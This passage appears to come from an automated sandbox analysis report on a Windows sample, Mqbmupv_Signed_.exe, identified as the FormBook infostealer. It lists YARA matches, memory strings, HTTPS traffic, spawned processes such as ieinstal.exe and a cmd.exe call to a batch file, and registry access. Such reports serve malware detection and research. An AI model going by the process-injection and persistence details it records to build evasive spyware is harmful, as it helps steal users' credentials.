4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741 Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724 Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00401030 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041D97B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DADA Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DBC0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402D90 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DDA4 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041E654 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DE0B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E2E Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE3 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE6 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DEFF Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DF1F Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402FB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0319EBB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0316F900 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03184120 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03221002 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317B090 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_031920A0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03186E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03160D20 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03231D55 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03192581 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317D5E0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317841F Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 50484224 appears 50 times Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: String function: 0231C890 appears 48 times Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0316B150 appears 32 times Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B2B4A4 appears 32 times Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B23AF4 appears 40 times
 PE / OLE file has an invalid certificate Show sources
 Source: Mqbmupv_Signed_.exe Static PE information: invalid certificate
 PE file contains strange resources Show sources
 Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
 Contains functionality to check free disk space Show sources
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_5048784E GetDiskFreeSpaceA,
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
 Executes batch files Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
 Parts of this applications are using Borland Delphi (Probably coded in Delphi) Show sources
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Windows\SysWOW64\notepad.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Source: C:\Users\user\AppData\Local\Mqbmnet.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27% Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Sample reads its own file content Show sources
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\Mqbmupv_Signed_.exe 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' Source: unknown Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe' Source: unknown Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe' Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: unknown Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: C:\Windows\SysWOW64\notepad.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat Source: C:\Windows\SysWOW64\notepad.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe' Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Mqbmnet.exe 'C:\Users\user\AppData\Local\Mqbmnet.exe' Source: C:\Users\user\AppData\Local\Mqbmnet.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Source: C:\Users\user\AppData\Local\Mqbmnet.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
 Writes ini files Show sources